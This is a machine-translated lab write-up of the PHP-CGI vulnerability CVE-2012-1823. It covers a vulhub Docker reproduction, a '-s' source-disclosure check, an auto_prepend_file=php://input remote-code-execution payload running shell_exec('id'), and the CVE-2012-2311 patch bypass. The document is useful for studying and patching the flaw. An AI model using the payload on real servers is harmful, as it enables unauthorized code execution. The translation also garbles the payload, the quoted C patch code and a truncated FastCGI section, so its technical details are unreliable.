PHP-CGI remote code execution vulnerability (CVE-2012-1823)

PHP-CGI remote code execution vulnerability (CVE-2012-1823)
vulnerability Introduction to

vulnerability analysis
PHP SAPI and mode of operation
in the PHP source code, there is a directory called sapi. sapi role in PHP, a message similar to the "transmitters", (PHP-FPM in FPM, its role is to accept the container through the web fastcgi protocol encapsulated data, to perform the PHP interpreter; FPM addition, the most common the sapi should be for Apache mod_php, for the data exchange between the sapi php and Apache.)

php-CGI is a sapi. In ancient times, the operation mode is very simple web application, web container after receiving the http packets get files (cgi script) requested by the user, and fork a child process (interpreter) to execute the file, and then take the execution result, directly returned to the user, while the interpreter child process will be over. Web application bash, perl and other languages are mostly performed in this manner based on this implementation is called cgi general, the default when you install Apache has a cgi-bin directory, the first is to place these cgi scripts of.

Cgi mode but there is a fatal flaw, it is well known for creating and scheduling processes have a certain consumption, and the number of processes is not unlimited. Therefore, the site is running normally not based cgi mode while receiving numerous requests otherwise, each request generates a child process, it is possible the server tumbled. So then there fastcgi, he has been fastcgi processes can be run in the background, and receive data packets through fastcgi protocol, it returns results after execution, but does not exit itself.

There is a php called sapi php-cgi, php-cgi has two functions, one way of providing interactive cgi, fastcgi second is to provide an interactive way. Also said that we can be like perl, getting the web container directly to fork a process to execute a php-cgi script; you can run in the background php-cgi -b 127.0.0.1:9000(php-cgi as fastcgi manager), and let the web container fastcgi 9000 agreement and interaction.

Then I said before fpm what is it? Why are there two fastcgi php manager? php fastcgi does have two managers, php-cgi can be run in fastcgi mode, fpm also run in fastcgi mode. But fpm is introduced at a later php version 5.3, it is a more efficient fastcgi manager, so now more and more web applications using php-fpm to run php.

CVE-2012-1823 is the php-cgi this sapi appeared loophole, I introduced the above two ways to run php-cgi offered: cgi and fastcgi, this vulnerability only occurs in php running in cgi mode.

This vulnerability Simply put, the user is requested querystring as a parameter php-cgi, eventually leading to a series of results.

Explore what principle, RFC3875 stipulates that when the case is not included no querystring = number of decoding, to querystring as a parameter cgi incoming. So, Apache server is required to achieve this functionality.

Vulnerability reproduce
exploit vulhub vulnerability testing environment

into the environment ssrf vulnerability

    cd vulhub-master / php / CVE -2012-1823
for environmental building

    docker-compose build
startup environment

    docker-compose up -d
then access the target address `http: ip: 8080`

vulnerability testing to

access the target address ` http: ip:? 8080 / index.php / - s`, if returned to the source, then there is the vulnerability

exploits

by read the source code, found by the controlled command line parameters cgi mode following parameters are available:

    the location of the php.ini file specified -c
    -n Do not load the php.ini file
    -d specify the configuration item
    starts fastcgi process -b
    -s display files Source
    -T execute the file specified times
    -h and - displays help?

It can be seen easiest is to use -s to view the source code,

arbitrary code execution

by using the -d specified auto_prepend_file to make any file that contains the vulnerability, to execute arbitrary code:

use burpsuite capture, then modify the contents of the packet in the `index.php` added later?

    -d -d + + + allow_url_include 3don the auto_prepend_file%%% 3dphp INPUT. 3A //
add content transmission `<php echo shell_exec (" id ")?; ?> `as follows:

as can be seen in the body content of the code has been executed and returns the result

principle analysis
PHP is a powerful language, PHP.INI there are two interesting configuration items, auto_prepend_file and auto_append_file.

auto_prepend_file tell PHP, before executing the target file, contains the first auto_prepend_file specified file; auto_append_file tells PHP, after the completion of the implementation of the target file, the file contains auto_append_file points.

So they're very interesting, suppose we set auto_prepend_file as php: // input, then it is equal before performing any php file must contain the POST again. So, we just need the code to be executed on the Body, they can be executed. (Of course, you also need to open a remote file contains options allow_url_include)

So, how do we set the value of auto_prepend_file?

This also involves PHP-FPM two environment variables, PHP_VALUE and PHP_ADMIN_VALUE. The two environment variables is used to set the PHP configuration items, PHP_VALUE mode can be set to PHP_INI_USER and PHP_INI_ALL options, PHP_ADMIN_VALUE can set all the options. (Except that the disable_functions, this option is time PHP determines the load, in the range of functions are not loaded into a direct context PHP)

Therefore, we finally pass as environment variables:

    {
        'GATEWAY_INTERFACE The': 'the FastCGI / 1.0' ,
        'REQUEST_METHOD': 'GET',
        'SCRIPT_FILENAME': '/var/www/html/index.php',

















CVE-2012-2311
later this vulnerability is burst out, PHP official be patched, released a new version 5.4.2 and 5.3.12, but this repair is not complete, can be bypassed, and thus derived CVE-2012 -2311 vulnerability.

PHP is to fix - was examined:

    IF (QUERY_STRING = getenv ( "the QUERY_STRING")) {
        decoded_query_string = strdup (QUERY_STRING);
        php_url_decode (decoded_query_string, strlen (decoded_query_string));
        IF (* decoded_query_string == '-' && the strchr (decoded_query_string, '=') == NULL) {
            skip_getopt =. 1;
        }
        Free (decoded_query_string);
    }
visible, after obtaining querystring decoding, if the first character is - is set skip_getopt, i.e. not acquired command line parameters .

This fix unsafe places that case if the operation and maintenance of the php-cgi was the case one package:

    ! # / Bin / SH     Exec / usr / local / bin / php-cgi $ *
    

By using whitespace plus - way, but also to pass parameters. This is the first time a character is whitespace querystring instead - a, bypassing the inspection.

Thus, php5.4.3 and continue to modify php5.3.13:

    IF ((QUERY_STRING = getenv ( "the QUERY_STRING")) = NULL && the strchr (QUERY_STRING, '=') == NULL!) {
        / * WE've GOT Query String that has NO = - Apache the CGI Will Pass IT to Command Line * /
        unsigned char * P;
        decoded_query_string = strdup (QUERY_STRING);
        php_url_decode (decoded_query_string, strlen (decoded_query_string));
        for (P = decoded_query_string; * P && * P < = ''; P ++) {
            / * Skip All leading Spaces * /
        }
        IF (* P == '-') {
            skip_getopt =. 1;
        }
        Free (decoded_query_string);

Skipping all white space (spaces equal to less than all of the characters), and then determines whether the first character is -.

Reference links:

[https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html](https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html)
[ https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823#cve-2012-2311](https://github.com/vulhub/vulhub/tree/master/php/CVE -2012-1823 # cve-2012-2311)